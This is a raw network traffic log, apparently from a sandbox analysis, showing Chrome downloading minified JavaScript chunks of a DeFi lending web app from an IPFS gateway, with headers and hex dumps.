                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:47 UTC1359INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:47 GMT
                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 17914
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreigkzrygmxak4nbiuiw3iuvjjypdpegb5fcnraloduf4y55nfsqzrq"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/_next/static/chunks/4254-ac0dd33f5ae839d3.js
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeibkk2t3wa2shw62jhntzsugx2oh7gf6zlbu3gb6gdxmeuwt6wi6se,bafybeihww4l5iuauf4leipzwanhudgpdxwdltpxcn6hqqud65jpcaq33xe,bafybeigaj3cwdjktvw36akiq43niv2siihkxaslemvv33lw5mhruragm5a,bafkreigkzrygmxak4nbiuiw3iuvjjypdpegb5fcnraloduf4y55nfsqzrq
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-dc13-10
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Age: 209553
                                                                                                                                                                                                                                                  2024-09-28 04:11:47 UTC74INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 61 30 65 34 33 35 34 63 34 65 37 64 30 63 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: Accept-Ranges: bytesServer: cloudflareCF-RAY: 8ca0e4354c4e7d0c-EWR
                                                                                                                                                                                                                                                  2024-09-28 04:11:47 UTC1369INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 34 32 35 34 5d 2c 7b 33 35 36 34 33 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 72 2e 64 28 74 2c 7b 67 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 47 7d 7d 29 3b 76 61 72 20 6e 3d 72 28 38 30 38 35 34 29 2c 61 3d 72 28 31 32 37 39 29 2c 69 3d 72 28 36 32 37 35 33 29 2c 73 3d 72 28 39 31 34 34 29 2c 6f 3d 72 28 33 30 31 32 30 29 2c 63 3d 72 28 39 30 31 34 39 29 2c 75 3d 72 28 35 36 33 37 31 29 2c 6c 3d 72 28 36 37 32 39 34 29 2c 64 3d 72 28 35 39 34 39 39 29 2c 70 3d 72 28 33 36 38 36 34 29 2c 66 3d 72 28 34 39 35 30 31 29 2c 76
                                                                                                                                                                                                                                                  Data Ascii: "use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[4254],{35643:function(e,t,r){r.d(t,{g:function(){return G}});var n=r(80854),a=r(1279),i=r(62753),s=r(9144),o=r(30120),c=r(90149),u=r(56371),l=r(67294),d=r(59499),p=r(36864),f=r(49501),v
                                                                                                                                                                                                                                                  2024-09-28 04:11:47 UTC1369INData Raw: 6e 52 70 63 50 72 6f 76 69 64 65 72 7d 29 29 3b 72 65 74 75 72 6e 28 30 2c 50 2e 68 29 28 7b 71 75 65 72 69 65 73 3a 65 2e 6d 61 70 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 7b 71 75 65 72 79 4b 65 79 3a 53 2e 42 2e 67 61 73 50 72 69 63 65 73 28 65 29 2c 71 75 65 72 79 46 6e 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 28 65 29 2e 67 65 74 46 65 65 44 61 74 61 28 29 2e 74 68 65 6e 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 2c 72 2c 6e 2c 61 2c 69 3d 7b 6c 65 67 61 63 79 47 61 73 50 72 69 63 65 3a 28 6e 75 6c 6c 3d 3d 3d 28 74 3d 65 2e 67 61 73 50 72 69 63 65 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 74 3f 76 6f 69 64 20 30 3a 74 2e 74 6f 53 74 72 69 6e 67 28
                                                                                                                                                                                                                                                  Data Ascii: nRpcProvider}));return(0,P.h)({queries:e.map((function(e){return{queryKey:S.B.gasPrices(e),queryFn:function(){return t(e).getFeeData().then((function(e){return function(e){var t,r,n,a,i={legacyGasPrice:(null===(t=e.gasPrice)||void 0===t?void 0:t.toString(
                                                                                                                                                                                                                                                  2024-09-28 04:11:47 UTC1369INData Raw: 75 2e 66 6f 72 6d 61 74 55 6e 69 74 73 29 28 65 2e 6d 75 6c 28 69 29 2c 31 38 29 29 2a 70 61 72 73 65 46 6c 6f 61 74 28 61 29 7d 28 72 2c 78 2e 67 61 73 4f 70 74 69 6f 6e 2c 78 2e 63 75 73 74 6f 6d 47 61 73 2c 45 2c 28 30 2c 61 2e 46 76 29 28 6e 75 6c 6c 3d 3d 3d 53 7c 7c 76 6f 69 64 20 30 3d 3d 3d 53 3f 76 6f 69 64 20 30 3a 53 2e 62 61 73 65 43 75 72 72 65 6e 63 79 44 61 74 61 2e 6e 65 74 77 6f 72 6b 42 61 73 65 54 6f 6b 65 6e 50 72 69 63 65 49 6e 55 73 64 2c 6e 75 6c 6c 3d 3d 3d 53 7c 7c 76 6f 69 64 20 30 3d 3d 3d 53 3f 76 6f 69 64 20 30 3a 53 2e 62 61 73 65 43 75 72 72 65 6e 63 79 44 61 74 61 2e 6e 65 74 77 6f 72 6b 42 61 73 65 54 6f 6b 65 6e 50 72 69 63 65 44 65 63 69 6d 61 6c 73 29 29 3a 76 6f 69 64 20 30 3b 72 65 74 75 72 6e 28 30 2c 68 2e 6a 73 78
                                                                                                                                                                                                                                                  Data Ascii: u.formatUnits)(e.mul(i),18))*parseFloat(a)}(r,x.gasOption,x.customGas,E,(0,a.Fv)(null===S||void 0===S?void 0:S.baseCurrencyData.networkBaseTokenPriceInUsd,null===S||void 0===S?void 0:S.baseCurrencyData.networkBaseTokenPriceDecimals)):void 0;return(0,h.jsx
                                                                                                                                                                                                                                                  2024-09-28 04:11:47 UTC1369INData Raw: 7c 28 72 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 21 65 29 72 65 74 75 72 6e 3b 69 66 28 22 73 74 72 69 6e 67 22 3d 3d 3d 74 79 70 65 6f 66 20 65 29 72 65 74 75 72 6e 20 79 28 65 2c 74 29 3b 76 61 72 20 72 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 74 6f 53 74 72 69 6e 67 2e 63 61 6c 6c 28 65 29 2e 73 6c 69 63 65 28 38 2c 2d 31 29 3b 22 4f 62 6a 65 63 74 22 3d 3d 3d 72 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 26 26 28 72 3d 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 2e 6e 61 6d 65 29 3b 69 66 28 22 4d 61 70 22 3d 3d 3d 72 7c 7c 22 53 65 74 22 3d 3d 3d 72 29 72 65 74 75 72 6e 20 41 72 72 61 79 2e 66 72 6f 6d 28 65 29 3b 69 66 28 22 41 72 67 75 6d 65 6e 74 73 22 3d 3d 3d 72 7c 7c 2f 5e 28 3f 3a 55 69 7c 49 29 6e 74 28 3f 3a 38 7c 31
                                                                                                                                                                                                                                                  Data Ascii: |(r=function(e,t){if(!e)return;if("string"===typeof e)return y(e,t);var r=Object.prototype.toString.call(e).slice(8,-1);"Object"===r&&e.constructor&&(r=e.constructor.name);if("Map"===r||"Set"===r)return Array.from(e);if("Arguments"===r||/^(?:Ui|I)nt(?:8|1
                                                                                                                                                                                                                                                  2024-09-28 04:11:47 UTC1369INData Raw: 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 73 28 72 29 29 3a 6a 28 4f 62 6a 65 63 74 28 72 29 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 74 2c 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 72 2c 74 29 29 7d 29 29 7d 72 65 74 75 72 6e 20 65 7d 76 61 72 20 54 3d 22 53 69 67 6e 65 64 20 63 6f 72 72 65 63 74 6c 79 22 2c 41 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 2e 68 61 6e 64 6c 65 47 65 74 54 78 6e 73 2c 72 3d 65 2e 68 61 6e 64 6c 65 47 65 74 50 65 72 6d 69 74 54 78 6e 73 2c 61 3d 65 2e 74 72 79 50 65 72 6d 69 74 2c 6f 3d 76 6f 69 64 20 30 21 3d 3d
                                                                                                                                                                                                                                                  Data Ascii: ject.getOwnPropertyDescriptors(r)):j(Object(r)).forEach((function(t){Object.defineProperty(e,t,Object.getOwnPropertyDescriptor(r,t))}))}return e}var T="Signed correctly",A=function(e){var t=e.handleGetTxns,r=e.handleGetPermitTxns,a=e.tryPermit,o=void 0!==
                                                                                                                                                                                                                                                  2024-09-28 04:11:47 UTC1369INData Raw: 2c 65 2e 6e 65 78 74 3d 34 2c 72 28 29 3b 63 61 73 65 20 34 3a 72 65 74 75 72 6e 20 73 3d 65 2e 73 65 6e 74 2c 65 2e 70 72 65 76 3d 35 2c 65 2e 6e 65 78 74 3d 38 2c 73 2e 77 61 69 74 28 31 29 3b 63 61 73 65 20 38 3a 70 65 2e 63 75 72 72 65 6e 74 26 26 61 26 26 61 28 73 29 2c 65 65 28 73 2e 68 61 73 68 2c 43 28 7b 74 78 53 74 61 74 65 3a 22 73 75 63 63 65 73 73 22 2c 61 63 74 69 6f 6e 3a 69 3f 75 2e 55 51 2e 61 70 70 72 6f 76 61 6c 3a 6e 75 6c 6c 21 3d 3d 41 26 26 76 6f 69 64 20 30 21 3d 3d 41 3f 41 3a 75 2e 55 51 2e 64 65 66 61 75 6c 74 7d 2c 6b 29 29 2c 7a 2e 69 6e 76 61 6c 69 64 61 74 65 51 75 65 72 69 65 73 28 7b 71 75 65 72 79 4b 65 79 3a 67 2e 42 2e 70 6f 6f 6c 7d 29 2c 7a 2e 69 6e 76 61 6c 69 64 61 74 65 51 75 65 72 69 65 73 28 7b 71 75 65 72 79 4b
                                                                                                                                                                                                                                                  Data Ascii: ,e.next=4,r();case 4:return s=e.sent,e.prev=5,e.next=8,s.wait(1);case 8:pe.current&&a&&a(s),ee(s.hash,C({txState:"success",action:i?u.UQ.approval:null!==A&&void 0!==A?A:u.UQ.default},k)),z.invalidateQueries({queryKey:g.B.pool}),z.invalidateQueries({queryK
                                                                                                                                                                                                                                                  2024-09-28 04:11:47 UTC1369INData Raw: 29 3a 22 42 4f 52 52 4f 57 5f 4d 49 47 52 41 54 4f 52 5f 56 33 22 3d 3d 3d 6f 2e 70 65 72 6d 69 74 54 79 70 65 3f 6e 2e 70 75 73 68 28 24 28 43 28 43 28 7b 7d 2c 6f 29 2c 7b 7d 2c 7b 64 65 61 64 6c 69 6e 65 3a 72 2c 73 70 65 6e 64 65 72 3a 72 65 2e 61 64 64 72 65 73 73 65 73 2e 56 33 5f 4d 49 47 52 41 54 4f 52 7c 7c 22 22 7d 29 29 29 3a 22 53 54 41 4b 45 22 3d 3d 3d 6f 2e 70 65 72 6d 69 74 54 79 70 65 26 26 6e 2e 70 75 73 68 28 74 65 28 7b 74 6f 6b 65 6e 3a 6f 2e 75 6e 64 65 72 6c 79 69 6e 67 41 73 73 65 74 2c 61 6d 6f 75 6e 74 3a 6f 2e 61 6d 6f 75 6e 74 2c 64 65 61 64 6c 69 6e 65 3a 72 7d 29 29 3a 6e 2e 70 75 73 68 28 4b 28 7b 72 65 73 65 72 76 65 3a 6f 2e 75 6e 64 65 72 6c 79 69 6e 67 41 73 73 65 74 2c 61 6d 6f 75 6e 74 3a 6f 2e 61 6d 6f 75 6e 74 2c 64
                                                                                                                                                                                                                                                  Data Ascii: ):"BORROW_MIGRATOR_V3"===o.permitType?n.push($(C(C({},o),{},{deadline:r,spender:re.addresses.V3_MIGRATOR||""}))):"STAKE"===o.permitType&&n.push(te({token:o.underlyingAsset,amount:o.amount,deadline:r})):n.push(K({reserve:o.underlyingAsset,amount:o.amount,d
                                                                                                                                                                                                                                                  2024-09-28 04:11:47 UTC1369INData Raw: 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 28 30 2c 69 2e 5a 29 28 63 28 29 2e 6d 61 72 6b 28 28 66 75 6e 63 74 69 6f 6e 20 74 28 72 2c 6e 29 7b 72 65 74 75 72 6e 20 63 28 29 2e 77 72 61 70 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 3b 3b 29 73 77 69 74 63 68 28 74 2e 70 72 65 76 3d 74 2e 6e 65 78 74 29 7b 63 61 73 65 20 30 3a 64 65 6c 65 74 65 20 65 2e 67 61 73 50 72 69 63 65 2c 66 65 28 7b 74 78 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 55 28 65 29 7d 2c 73 75 63 63 65 73 73 43 61 6c 6c 62 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 28 65 29 7d 2c 65 72 72 6f 72 43 61 6c 6c 62 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 72 3d 28 30 2c 62 2e 57 47 29
                                                                                                                                                                                                                                                  Data Ascii: n new Promise(function(){var t=(0,i.Z)(c().mark((function t(r,n){return c().wrap((function(t){for(;;)switch(t.prev=t.next){case 0:delete e.gasPrice,fe({tx:function(){return U(e)},successCallback:function(e){r(e)},errorCallback:function(e,t){var r=(0,b.WG)
                                                                                                                                                                                                                                                  2024-09-28 04:11:47 UTC1369INData Raw: 47 29 28 65 2c 62 2e 61 44 2e 4d 41 49 4e 5f 41 43 54 49 4f 4e 29 3b 4d 28 72 29 2c 47 28 7b 74 78 48 61 73 68 3a 74 2c 6c 6f 61 64 69 6e 67 3a 21 31 7d 29 7d 7d 29 29 3b 63 61 73 65 20 31 35 3a 65 2e 70 72 65 76 3d 31 35 2c 65 2e 74 30 3d 65 2e 63 61 74 63 68 28 33 29 2c 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 65 2e 74 30 2c 22 65 72 72 6f 72 22 29 2c 61 3d 28 30 2c 62 2e 57 47 29 28 65 2e 74 30 2c 62 2e 61 44 2e 47 41 53 5f 45 53 54 49 4d 41 54 49 4f 4e 2c 21 31 29 2c 4d 28 61 29 2c 47 28 7b 74 78 48 61 73 68 3a 76 6f 69 64 20 30 2c 6c 6f 61 64 69 6e 67 3a 21 31 7d 29 3b 63 61 73 65 20 32 31 3a 69 66 28 6c 65 26 26 61 65 7c 7c 21 6f 65 29 7b 65 2e 6e 65 78 74 3d 33 37 3b 62 72 65 61 6b 7d 72 65 74 75 72 6e 20 65 2e 70 72 65 76 3d 32 32 2c 47 28 43 28 43 28
                                                                                                                                                                                                                                                  Data Ascii: G)(e,b.aD.MAIN_ACTION);M(r),G({txHash:t,loading:!1})}}));case 15:e.prev=15,e.t0=e.catch(3),console.log(e.t0,"error"),a=(0,b.WG)(e.t0,b.aD.GAS_ESTIMATION,!1),M(a),G({txHash:void 0,loading:!1});case 21:if(le&&ae||!oe){e.next=37;break}return e.prev=22,G(C(C(


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  92192.168.2.549811209.94.90.34431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:47 UTC504OUTGET /_next/static/chunks/4815-7cc90f45fe6229bd.js HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:47 UTC1360INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:47 GMT
                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 11171
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreiapnlgaomw3z7lfvwsvspfnumv6qafve355tjr4eukz6gvpz4k6xa"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/_next/static/chunks/4815-7cc90f45fe6229bd.js
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeibkk2t3wa2shw62jhntzsugx2oh7gf6zlbu3gb6gdxmeuwt6wi6se,bafybeihww4l5iuauf4leipzwanhudgpdxwdltpxcn6hqqud65jpcaq33xe,bafybeigaj3cwdjktvw36akiq43niv2siihkxaslemvv33lw5mhruragm5a,bafkreiapnlgaomw3z7lfvwsvspfnumv6qafve355tjr4eukz6gvpz4k6xa
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-ny5-01
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Age: 13028481
                                                                                                                                                                                                                                                  2024-09-28 04:11:47 UTC74INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 61 30 65 34 33 35 37 62 36 63 64 65 39 33 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: Accept-Ranges: bytesServer: cloudflareCF-RAY: 8ca0e4357b6cde93-EWR
                                                                                                                                                                                                                                                  2024-09-28 04:11:47 UTC1304INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 34 38 31 35 5d 2c 7b 32 35 35 36 33 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 72 2e 64 28 74 2c 7b 68 75 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 5a 7d 2c 67 4f 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 43 7d 2c 74 46 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 4d 7d 7d 29 3b 76 61 72 20 6e 3d 72 28 35 39 34 39 39 29 2c 6f 3d 72 28 34 39 35 30 31 29 2c 69 3d 72 28 36 31 37 38 32 29 2c 61 3d 72 28 33 30 31 32 30 29 2c 73 3d 72 28 37 32 33 38 39 29 2c 63 3d 72 28 36 32 30 39 37 29 2c 6c 3d 72 28 36
                                                                                                                                                                                                                                                  Data Ascii: "use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[4815],{25563:function(e,t,r){r.d(t,{hu:function(){return Z},gO:function(){return C},tF:function(){return M}});var n=r(59499),o=r(49501),i=r(61782),a=r(30120),s=r(72389),c=r(62097),l=r(6
                                                                                                                                                                                                                                                  2024-09-28 04:11:47 UTC1369INData Raw: 3a 6e 5b 30 5d 7d 7d 2c 43 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 2e 73 69 7a 65 2c 72 3d 65 2e 6c 6f 67 6f 2c 6e 3d 65 2e 74 65 73 74 43 68 61 69 6e 4e 61 6d 65 2c 6f 3d 65 2e 73 78 3b 72 65 74 75 72 6e 28 30 2c 79 2e 6a 73 78 73 29 28 61 2e 5a 2c 7b 73 78 3a 77 28 7b 6d 72 3a 32 2c 77 69 64 74 68 3a 74 2c 68 65 69 67 68 74 3a 74 2c 70 6f 73 69 74 69 6f 6e 3a 22 72 65 6c 61 74 69 76 65 22 7d 2c 6f 29 2c 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 79 2e 6a 73 78 29 28 22 69 6d 67 22 2c 7b 73 72 63 3a 72 2c 61 6c 74 3a 22 22 2c 77 69 64 74 68 3a 22 31 30 30 25 22 2c 68 65 69 67 68 74 3a 22 31 30 30 25 22 7d 29 2c 6e 26 26 28 30 2c 79 2e 6a 73 78 29 28 73 2e 5a 2c 7b 74 69 74 6c 65 3a 6e 2c 61 72 72 6f 77 3a 21 30 2c 63 68 69 6c 64 72 65 6e
                                                                                                                                                                                                                                                  Data Ascii: :n[0]}},C=function(e){var t=e.size,r=e.logo,n=e.testChainName,o=e.sx;return(0,y.jsxs)(a.Z,{sx:w({mr:2,width:t,height:t,position:"relative"},o),children:[(0,y.jsx)("img",{src:r,alt:"",width:"100%",height:"100%"}),n&&(0,y.jsx)(s.Z,{title:n,arrow:!0,children
                                                                                                                                                                                                                                                  2024-09-28 04:11:47 UTC1369INData Raw: 74 77 6f 72 6b 3b 72 65 74 75 72 6e 28 30 2c 79 2e 6a 73 78 73 29 28 61 2e 5a 2c 7b 73 78 3a 7b 64 69 73 70 6c 61 79 3a 22 66 6c 65 78 22 2c 61 6c 69 67 6e 49 74 65 6d 73 3a 22 63 65 6e 74 65 72 22 7d 2c 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 79 2e 6a 73 78 29 28 43 2c 7b 73 69 7a 65 3a 53 3f 33 32 3a 32 38 2c 6c 6f 67 6f 3a 6e 2e 6e 65 74 77 6f 72 6b 4c 6f 67 6f 50 61 74 68 2c 74 65 73 74 43 68 61 69 6e 4e 61 6d 65 3a 50 28 72 2e 6d 61 72 6b 65 74 54 69 74 6c 65 29 2e 74 65 73 74 43 68 61 69 6e 4e 61 6d 65 7d 29 2c 28 30 2c 79 2e 6a 73 78 73 29 28 61 2e 5a 2c 7b 73 78 3a 7b 6d 72 3a 31 2c 64 69 73 70 6c 61 79 3a 22 69 6e 6c 69 6e 65 2d 66 6c 65 78 22 2c 61 6c 69 67 6e 49 74 65 6d 73 3a 22 66 6c 65 78 2d 73 74 61 72 74 22 7d 2c 63 68 69 6c 64 72 65 6e 3a
                                                                                                                                                                                                                                                  Data Ascii: twork;return(0,y.jsxs)(a.Z,{sx:{display:"flex",alignItems:"center"},children:[(0,y.jsx)(C,{size:S?32:28,logo:n.networkLogoPath,testChainName:P(r.marketTitle).testChainName}),(0,y.jsxs)(a.Z,{sx:{mr:1,display:"inline-flex",alignItems:"flex-start"},children:
                                                                                                                                                                                                                                                  2024-09-28 04:11:47 UTC1369INData Raw: 73 2c 65 78 63 6c 75 73 69 76 65 3a 21 30 2c 6f 6e 43 68 61 6e 67 65 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 6e 75 6c 6c 21 3d 3d 74 26 26 4f 28 74 29 7d 2c 73 78 3a 7b 77 69 64 74 68 3a 22 31 30 30 25 22 2c 68 65 69 67 68 74 3a 22 33 36 70 78 22 2c 62 61 63 6b 67 72 6f 75 6e 64 3a 4d 2e 70 61 6c 65 74 74 65 2e 70 72 69 6d 61 72 79 2e 6d 61 69 6e 2c 62 6f 72 64 65 72 3a 22 31 70 78 20 73 6f 6c 69 64 20 22 2e 63 6f 6e 63 61 74 28 22 64 61 72 6b 22 3d 3d 3d 4d 2e 70 61 6c 65 74 74 65 2e 6d 6f 64 65 3f 22 72 67 62 61 28 32 33 35 2c 20 32 33 35 2c 20 32 33 37 2c 20 30 2e 31 32 29 22 3a 22 23 31 42 32 30 33 30 22 29 2c 62 6f 72 64 65 72 52 61 64 69 75 73 3a 22 36 70 78 22 2c 6d 61 72 67 69 6e 54 6f 70 3a 22 31 36 70 78 22 2c 6d 61 72 67 69 6e 42 6f 74 74
                                                                                                                                                                                                                                                  Data Ascii: s,exclusive:!0,onChange:function(e,t){null!==t&&O(t)},sx:{width:"100%",height:"36px",background:M.palette.primary.main,border:"1px solid ".concat("dark"===M.palette.mode?"rgba(235, 235, 237, 0.12)":"#1B2030"),borderRadius:"6px",marginTop:"16px",marginBott
                                                                                                                                                                                                                                                  2024-09-28 04:11:47 UTC1369INData Raw: 2c 79 2e 6a 73 78 29 28 6f 2e 63 43 2c 7b 69 64 3a 22 56 65 72 73 69 6f 6e 20 32 22 7d 29 7d 29 7d 29 5d 7d 29 7d 29 2c 6a 2e 7a 32 2e 6d 61 70 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 5a 28 65 29 2c 72 3d 74 2e 6d 61 72 6b 65 74 2c 6e 3d 74 2e 6e 65 74 77 6f 72 6b 2c 6f 3d 50 28 72 2e 6d 61 72 6b 65 74 54 69 74 6c 65 29 3b 72 65 74 75 72 6e 28 30 2c 79 2e 6a 73 78 73 29 28 78 2e 5a 2c 7b 22 64 61 74 61 2d 63 79 22 3a 22 6d 61 72 6b 65 74 53 65 6c 65 63 74 6f 72 5f 22 2e 63 6f 6e 63 61 74 28 65 29 2c 76 61 6c 75 65 3a 65 2c 73 78 3a 7b 22 2e 4d 75 69 4c 69 73 74 49 74 65 6d 49 63 6f 6e 2d 72 6f 6f 74 22 3a 7b 6d 69 6e 57 69 64 74 68 3a 22 75 6e 73 65 74 22 7d 2c 64 69 73 70 6c 61 79 3a 72 2e 76 33 26 26 73 3d 3d 3d 46 2e 56 32 7c 7c 21
                                                                                                                                                                                                                                                  Data Ascii: ,y.jsx)(o.cC,{id:"Version 2"})})})]})}),j.z2.map((function(e){var t=Z(e),r=t.market,n=t.network,o=P(r.marketTitle);return(0,y.jsxs)(x.Z,{"data-cy":"marketSelector_".concat(e),value:e,sx:{".MuiListItemIcon-root":{minWidth:"unset"},display:r.v3&&s===F.V2||!
